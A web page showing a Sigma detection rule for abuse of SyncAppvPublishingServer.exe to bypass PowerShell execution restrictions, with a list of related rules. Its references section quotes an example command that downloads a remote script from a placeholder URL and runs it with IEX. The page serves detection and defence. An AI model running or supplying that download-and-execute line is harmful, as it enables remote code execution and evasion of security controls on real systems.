SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
Sigma rule (View on GitHub)
1title: SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
2id: fe5ce7eb-dad8-467c-84a9-31ec23bd644a
3related:
4 - id: fde7929d-8beb-4a4c-b922-be9974671667
5 type: derived
6 - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299
7 type: derived
8status: test
9description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
10references:
11 - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
12author: 'Ensar Şamil, @sblmsrsn, OSCD Community'
13date: 2020/10/05
14modified: 2022/12/02
15tags:
16 - attack.defense_evasion
17 - attack.t1218
18logsource:
19 product: windows
20 category: ps_module
21 definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
22detection:
23 selection:
24 ContextInfo|contains: 'SyncAppvPublishingServer.exe'
25 condition: selection
26falsepositives:
27 - App-V clients
28level: medium
References
-
Example command on how inject Powershell code into the process SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Use caseUse SyncAppvPub...
Read More
Related rules
- Created Files by Microsoft Sync Center
- DeviceCredentialDeployment Execution
- Execute MSDT Via Answer File
- Execute Pcwrun.EXE To Leverage Follina
- Ie4uinit Lolbin Use From Invalid Path